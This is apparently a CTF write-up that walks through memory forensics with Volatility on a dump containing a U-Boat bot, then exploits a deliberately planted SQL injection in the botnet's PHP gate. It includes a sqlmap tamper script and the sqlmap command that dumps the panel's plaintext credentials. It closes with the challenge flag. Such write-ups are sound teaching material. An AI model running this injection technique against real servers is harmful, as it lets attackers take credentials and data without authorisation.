So, we have a memory dump. Let's spin up
[volatility](https://github.com/volatilityfoundation/volatility)!

```bash  
% python vol.py imageinfo -f ../20200724.mem  
Volatility Foundation Volatility Framework 2.6.1  
INFO : volatility.debug : Determining profile based on KDBG search...  
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86_24000,
Win7SP1x86  
AS Layer1 : IA32PagedMemoryPae (Kernel AS)  
AS Layer2 : FileAddressSpace
(/Users/ilyaluk/ctf/cybrics20/botmaster/20200724.mem)  
PAE type : PAE  
DTB : 0x185000L  
KDBG : 0x8276cc68L  
Number of Processors : 2  
Image Type (Service Pack) : 1  
KPCR for CPU 0 : 0x8276dd00L  
KPCR for CPU 1 : 0x807cc000L  
KUSER_SHARED_DATA : 0xffdf0000L  
Image date and time : 2020-07-24 15:44:22 UTC+0000  
Image local date and time : 2020-07-24 18:44:22 +0300

% python vol.py \--profile=Win7SP1x86_23418 -f ../20200724.mem pstree  
Volatility Foundation Volatility Framework 2.6.1  
Name Pid PPid Thds Hnds Time  
\-------------------------------------------------- ------ ------ ------
------ ----  
0x83d3acf0:System 4 0 84 549 2020-07-24 15:39:17 UTC+0000  
. 0x84405418:smss.exe 228 4 2 30 2020-07-24 15:39:17 UTC+0000  
0x843a4638:csrss.exe 308 288 9 419 2020-07-24 15:39:23 UTC+0000  
0x84b14d28:wininit.exe 352 288 5 81 2020-07-24 15:39:24 UTC+0000  
. 0x84b46250:services.exe 456 352 7 200 2020-07-24 15:39:26 UTC+0000  
.. 0x84bf0b08:svchost.exe 812 456 20 469 2020-07-24 15:39:31 UTC+0000  
... 0x84330508:audiodg.exe 960 812 6 131 2020-07-24 15:39:33 UTC+0000  
.. 0x84c42b70:svchost.exe 1036 456 23 520 2020-07-24 15:39:34 UTC+0000  
.. 0x84d00a48:svchost.exe 1436 456 24 381 2020-07-24 15:39:39 UTC+0000  
.. 0x84cbf7e0:svchost.exe 1316 456 18 315 2020-07-24 15:39:37 UTC+0000  
.. 0x84d943b8:svchost.exe 1836 456 5 98 2020-07-24 15:39:44 UTC+0000  
.. 0x84e7f770:SearchIndexer. 2060 456 11 633 2020-07-24 15:39:59 UTC+0000  
... 0x83f4fd28:SearchFilterHo 1732 2060 6 93 2020-07-24 15:43:25 UTC+0000  
... 0x843ac030:SearchProtocol 2836 2060 7 278 2020-07-24 15:43:25 UTC+0000  
.. 0x83f4b648:svchost.exe 2224 456 12 340 2020-07-24 15:41:46 UTC+0000  
.. 0x84b82030:svchost.exe 564 456 11 360 2020-07-24 15:39:29 UTC+0000  
... 0x83f72550:WmiPrvSE.exe 716 564 9 123 2020-07-24 15:41:49 UTC+0000  
... 0x83fe2d28:WmiPrvSE.exe 3512 564 7 167 2020-07-24 15:42:40 UTC+0000  
.. 0x84b98358:svchost.exe 692 456 8 275 2020-07-24 15:39:31 UTC+0000  
.. 0x84d34978:taskhost.exe 1996 456 8 187 2020-07-24 15:39:45 UTC+0000  
.. 0x84bf9c70:svchost.exe 844 456 19 397 2020-07-24 15:39:32 UTC+0000  
... 0x84e25030:dwm.exe 924 844 3 67 2020-07-24 15:39:48 UTC+0000  
.. 0x83f5e198:wmpnetwk.exe 284 456 13 435 2020-07-24 15:41:47 UTC+0000  
.. 0x83efcac0:sppsvc.exe 336 456 4 144 2020-07-24 15:41:46 UTC+0000  
... 0x84b13030:csrss.exe 344 336 8 236 2020-07-24 15:39:24 UTC+0000  
.... 0x83fc5998:conhost.exe 2272 344 2 35 2020-07-24 15:44:21 UTC+0000  
... 0x84b12418:winlogon.exe 380 336 5 137 2020-07-24 15:39:25 UTC+0000  
.. 0x84bfebb8:svchost.exe 872 456 38 1060 2020-07-24 15:39:32 UTC+0000  
... 0x83fee7b8:wuauclt.exe 3908 872 5 92 2020-07-24 15:42:55 UTC+0000  
.. 0x84c60348:svchost.exe 1132 456 16 384 2020-07-24 15:39:35 UTC+0000  
.. 0x84b8d470:VBoxService.ex 628 456 12 117 2020-07-24 15:39:30 UTC+0000  
.. 0x84ca0030:spoolsv.exe 1272 456 12 296 2020-07-24 15:39:37 UTC+0000  
. 0x84b4d030:lsass.exe 464 352 9 575 2020-07-24 15:39:26 UTC+0000  
. 0x84b4e928:lsm.exe 472 352 11 146 2020-07-24 15:39:26 UTC+0000  
0x84dee408:explorer.exe 1388 468 42 1124 2020-07-24 15:39:48 UTC+0000  
. 0x84e8e908:bot.exe 2444 1388 4 142 2020-07-24 15:40:45 UTC+0000  
. 0x84f19360:RamCapture.exe 3296 1388 3 63 2020-07-24 15:44:21 UTC+0000  
. 0x84e750e0:VBoxTray.exe 1988 1388 13 171 2020-07-24 15:39:53 UTC+0000  
```

Huh, `bot.exe`. Seems suspicious. Let's dump the binary and take a look:  
```bash  
% python vol.py \--profile=Win7SP1x86_23418 -f ../20200724.mem procdump -p
2444 -D dump  
Volatility Foundation Volatility Framework 2.6.1  
Process(V) ImageBase Name Result  
\---------- ---------- -------------------- ------  
0x84e8e908 0x011d0000 bot.exe OK: executable.2444.exe  
```

While skimming through the strings in this binary we stumble across something
that seems like C&C server IP, some urls and HTTP implementation strings:  
```  
95.217.215.227  
/gate  
localhost  
/UBoat/gate.php  
X-Token  
X-Id  
POST  
HTTP Response Code  
%s %s HTTP/1.0  
Content-Type: application/x-www-form-urlencoded  
```

As it turns out this is an open-source botnet named
[U-Boat](https://github.com/UBoat-Botnet/UBoat).

I ran a small [Dirb](https://tools.kali.org/web-applications/dirb) scan that
yielded several pages, and most interesting one was `/login` (of course, that
could be acheived through reading the [panel source
code](https://github.com/UBoat-Botnet/UBoat-Panel) or pure guessing):

![](https://i.imgur.com/E34SL0W.png)

Oh, [download for my friends](http://95.217.215.227/Panel_for_friends.zip).
How cool is that? Let's download this and check for diffs between it and
latest version from the repo:

```  
% diff -rupw UBoat-Panel Panel_for_friends  
```

The most suspicous patch occurs around crafting some SQL query:

![](https://i.imgur.com/gISCIQn.png)

That looks like intentional SQL-injection. So, how to trigger it? This code
handles heartbeats from bots. For instance, it is called from main `/gate`
handler.

```php  
$heart = $this->loadHelper('heartbeat');  
$encrypted = $_POST['x'];  
$key = getallheaders()['X-Token'];  
$decrypted = $this->BoatDecryptionRoutine($encrypted, $key);

$commandData = null;  
$commandType = null;

$commandId = $this->ParseCommand($decrypted, $commandData, $commandType);

$output = $this->CreateCommand(-1, -1, 'This will terminate the app.');

switch ($commandType) {  
case 0:  
//its a join  
//handle the db incertion  
$ip = null;  
if (! empty($_SERVER['HTTP_CLIENT_IP'])) {  
$ip = $_SERVER['HTTP_CLIENT_IP'];  
} elseif (! empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {  
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];  
} else {  
$ip = $_SERVER['REMOTE_ADDR'];  
}  
$_dbcommand = $commandData;  
$_dbcommand .= '@'.$ip;

$ip = $geo_helper->GetCountryFromAddress($ip);  
$_dbcommand .= '@'.$ip['country_name'].'@'.$ip['country_code'];  
$botId = $heart->beat($heart->splitToArray($_dbcommand));

$output = $this->CreateCommand(-1, 0, $botId);

break;  
```

Simple encryption is utilized here:

```php  
private function ParseCommand($rawData, &$data, &$commandType)  
{  
$splitInfo = explode('|', $rawData);  
$data = urldecode($splitInfo[2]);  
$commandType = (int) $splitInfo[1];

return (int) $splitInfo[0];  
}

private function XORInputKey($input, $key, $inputLength, $keyLength)  
{  
$output = [];  
for ($i = 0; $i < $inputLength; ++$i) {  
$output[] = $input[$i] ^ $key[$i % $keyLength];  
}

return $output;  
}

//we'll use this xor shit kk

private function BoatDecryptionRoutine($input, $key)  
{  
$output = str_split(urldecode($input));  
$key = str_split(urldecode($key));  
$output = $this->XORInputKey($output, $key, count($output), count($key));

return implode($output);  
}  
```

Let's write a simple tamper script for sqlmap:

```python  
import base64

def xor(data):  
return ''.join(chr(ord(i) ^ ord('1')) for i in data)

def tamper(payload, **kwargs):  
x = '0|0|{bbed3e02-0b41-11e3-8249-806e6f6e6963}@Microsoft Windows 8@Intel(R)
Core(TM)@2.90GHz@NVIDIA GeForce GTX [email protected]@false@1' + payload  
return xor(x)  
```

From `src/uboat.sql` we know that password is stored in plaintext in `user`
table of `uboat` DB. So, this should do the trick.

`% sqlmap -u 'http://95.217.215.227/gate' --headers='X-Token:1' --data "x=1"
-p "x" --method POST --tamper tamper.py -D uboat -T user -C username,password
--dump`  
```  
Database: uboat  
Table: user  
[1 entry]  
+----------+-------------+  
| username | password |  
+----------+-------------+  
| root | p@$$w0Rd123 |  
+----------+-------------+  
```

Neat, let's login to the dashboard:

![](https://i.imgur.com/feXSPZr.png)

Vurtualbox machine on Win7 looks like what we need. For some reason, I could
not use U-Boat's UI for reading logs (right-click on bot → read logs), so
let's poke around that using curl and using knowledge of panel source code:

```  
% curl 'http://95.217.215.227/tasks/readLog' \  
\--data 'bot=57' \  
-H 'Cookie: PHPSESSID=1c391ad1cc0663425b41b46c75db61db'

Left Windows  
rnotepad[Enter]

cybrics{be_safe_from_bots}[Enter]

[Enter]  
```

> `cybrics{be_safe_from_bots}`